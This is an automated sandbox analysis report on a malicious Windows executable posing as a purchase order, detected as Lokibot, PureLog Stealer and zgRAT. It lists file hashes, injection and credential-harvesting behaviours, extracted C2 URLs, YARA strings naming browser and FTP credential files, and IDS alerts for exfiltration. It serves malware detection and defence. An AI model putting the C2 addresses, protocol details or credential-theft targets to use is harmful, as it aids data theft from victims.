Edit tour

Windows Analysis Report
rPedidodecompraPO20441ARIMComponentes.exe

Overview

General Information

Sample name:	rPedidodecompra__PO20441__ARIMComponentes.exe
Analysis ID:	1541288
MD5:	13a22d03a02d5ba40e7865b1595db7a2
SHA1:	93fabdf07e6ed1c0316ebb5db63b28e041586e46
SHA256:	088bb7500d35c7ab73827301e505660559437479ef46312c3ee08b6253f35953
Tags:	exeuser-Porcupine
Infos:

Detection

Lokibot, PureLog Stealer, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Malicious sample detected (through community Yara rule)

Suricata IDS alerts for network traffic

Yara detected Lokibot

Yara detected PureLog Stealer

Yara detected zgRAT

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

Machine Learning detection for sample

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Writes to foreign memory regions

Yara detected aPLib compressed binary

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: AspNetCompiler Execution

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

rPedidodecompra__PO20441__ARIMComponentes.exe (PID: 2584 cmdline: "C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe" MD5: 13A22D03A02D5BA40E7865B1595DB7A2)

aspnet_compiler.exe (PID: 6128 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Loki Password Stealer (PWS), LokiBot	"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2	SWEED The Gorgon Group Cobalt	http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html http://reversing.fun/posts/2021/06/08/lokibot.html http://reversing.fun/reversing/2021/06/08/lokibot.html http://www.malware-traffic-analysis.net/2017/06/12/index.html https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file	https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "https://dddotx.shop/Mine/PWS/fre.php"]}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
rPedidodecompra__PO20441__ARIMComponentes.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
rPedidodecompra__PO20441__ARIMComponentes.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
rPedidodecompra__PO20441__ARIMComponentes.exe	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x15f07:$s1: file:/// 0x15e15:$s2: {11111-22222-10009-11112} 0x15e97:$s3: {11111-22222-50001-00000} 0x14f21:$s4: get_Module 0x14199:$s5: Reverse 0x13fcc:$s6: BlockCopy 0x14280:$s7: ReadByte 0x15f19:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.3328760940.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
00000000.00000002.2115300674.0000000003085000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.2115300674.0000000003085000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.2115300674.0000000003085000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2115300674.0000000003085000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x1c1f8:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.2115300674.0000000003085000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x95ab:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.2115300674.0000000003085000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x17def:$des3: 68 03 66 00 00 0x1c1f8:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x1c2c4:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
00000000.00000000.2086467248.0000000000C42000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.2115367429.0000000004041000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.2115367429.0000000004041000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.2115367429.0000000004041000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2115367429.0000000004041000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x1b960:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.2115367429.0000000004041000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x8d2b:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.2115367429.0000000004041000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x1756f:$des3: 68 03 66 00 00 0x1b960:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x1ba2c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000002.00000002.3328760940.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: rPedidodecompra__PO20441__ARIMComponentes.exe PID: 2584	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: rPedidodecompra__PO20441__ARIMComponentes.exe PID: 2584	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: rPedidodecompra__PO20441__ARIMComponentes.exe PID: 2584	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x4848b:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x10a9dc:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: aspnet_compiler.exe PID: 6128	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: aspnet_compiler.exe PID: 6128	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: aspnet_compiler.exe PID: 6128	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: aspnet_compiler.exe PID: 6128	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x3a11:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Click to see the 25 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.aspnet_compiler.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
2.2.aspnet_compiler.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
2.2.aspnet_compiler.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.aspnet_compiler.exe.400000.0.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
2.2.aspnet_compiler.exe.400000.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
2.2.aspnet_compiler.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
2.2.aspnet_compiler.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
2.2.aspnet_compiler.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.4045570.2.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.4045570.2.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.4045570.2.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.4045570.2.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.4045570.2.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.4045570.2.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.4045570.2.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.4045570.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.4045570.2.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.4045570.2.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.4045570.2.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.4045570.2.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.4045570.2.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
2.2.aspnet_compiler.exe.400000.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
2.2.aspnet_compiler.exe.400000.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
2.2.aspnet_compiler.exe.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.aspnet_compiler.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
2.2.aspnet_compiler.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
2.2.aspnet_compiler.exe.400000.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
2.2.aspnet_compiler.exe.400000.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
2.2.aspnet_compiler.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
0.0.rPedidodecompra__PO20441__ARIMComponentes.exe.c40000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.0.rPedidodecompra__PO20441__ARIMComponentes.exe.c40000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.0.rPedidodecompra__PO20441__ARIMComponentes.exe.c40000.0.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x15f07:$s1: file:/// 0x15e15:$s2: {11111-22222-10009-11112} 0x15e97:$s3: {11111-22222-50001-00000} 0x14f21:$s4: get_Module 0x14199:$s5: Reverse 0x13fcc:$s6: BlockCopy 0x14280:$s7: ReadByte 0x15f19:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
Click to see the 27 entries

Sigma Signatures

System Summary

Sigma detected: AspNetCompiler Execution

Source: Process started

Author: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe", ParentImage: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe, ParentProcessId: 2584, ParentProcessName: rPedidodecompra__PO20441__ARIMComponentes.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ProcessId: 6128, ProcessName: aspnet_compiler.exe

Suricata Signatures

ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T17:02:07.687491+0200	2024312	1	A Network Trojan was detected	192.168.2.5	49704	188.114.96.3	80	TCP
2024-10-24T17:02:08.867503+0200	2024312	1	A Network Trojan was detected	192.168.2.5	49705	188.114.96.3	80	TCP

ET MALWARE LokiBot Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T17:02:06.733299+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49704	188.114.96.3	80	TCP
2024-10-24T17:02:07.830536+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49705	188.114.96.3	80	TCP
2024-10-24T17:02:08.934078+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49706	188.114.96.3	80	TCP
2024-10-24T17:02:10.185322+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49707	188.114.96.3	80	TCP
2024-10-24T17:02:11.235526+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49708	188.114.96.3	80	TCP
2024-10-24T17:02:12.361135+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49709	188.114.96.3	80	TCP
2024-10-24T17:02:13.549321+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49710	188.114.96.3	80	TCP
2024-10-24T17:02:17.079419+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49717	188.114.96.3	80	TCP
2024-10-24T17:02:20.619456+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49735	188.114.96.3	80	TCP
2024-10-24T17:02:21.691587+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49745	188.114.96.3	80	TCP
2024-10-24T17:02:23.211146+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49757	188.114.96.3	80	TCP
2024-10-24T17:02:24.561675+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49763	188.114.96.3	80	TCP
2024-10-24T17:02:25.747925+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49774	188.114.96.3	80	TCP
2024-10-24T17:02:26.794870+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49780	188.114.96.3	80	TCP
2024-10-24T17:02:27.825461+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49786	188.114.96.3	80	TCP
2024-10-24T17:02:28.879212+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49792	188.114.96.3	80	TCP
2024-10-24T17:02:29.936630+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49798	188.114.96.3	80	TCP
2024-10-24T17:02:31.015360+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49806	188.114.96.3	80	TCP
2024-10-24T17:02:33.298933+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49820	188.114.96.3	80	TCP
2024-10-24T17:02:34.372256+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49826	188.114.96.3	80	TCP
2024-10-24T17:02:35.421423+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49832	188.114.96.3	80	TCP
2024-10-24T17:02:37.545568+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49845	188.114.96.3	80	TCP
2024-10-24T17:02:38.638011+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49853	188.114.96.3	80	TCP
2024-10-24T17:02:39.658318+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49859	188.114.96.3	80	TCP
2024-10-24T17:02:40.998847+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49866	188.114.96.3	80	TCP
2024-10-24T17:02:42.218170+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49875	188.114.96.3	80	TCP
2024-10-24T17:02:43.317732+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49881	188.114.96.3	80	TCP
2024-10-24T17:02:45.544944+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49893	188.114.96.3	80	TCP
2024-10-24T17:02:46.580422+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49899	188.114.96.3	80	TCP
2024-10-24T17:02:47.796961+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49907	188.114.96.3	80	TCP
2024-10-24T17:02:51.046250+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49925	188.114.96.3	80	TCP
2024-10-24T17:02:53.656102+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49941	188.114.96.3	80	TCP
2024-10-24T17:02:58.245581+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49963	188.114.96.3	80	TCP
2024-10-24T17:02:59.443401+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49968	188.114.96.3	80	TCP
2024-10-24T17:03:00.546134+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49972	188.114.96.3	80	TCP
2024-10-24T17:03:01.672985+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49976	188.114.96.3	80	TCP
2024-10-24T17:03:04.124054+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49980	188.114.96.3	80	TCP
2024-10-24T17:03:05.169370+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49983	188.114.96.3	80	TCP
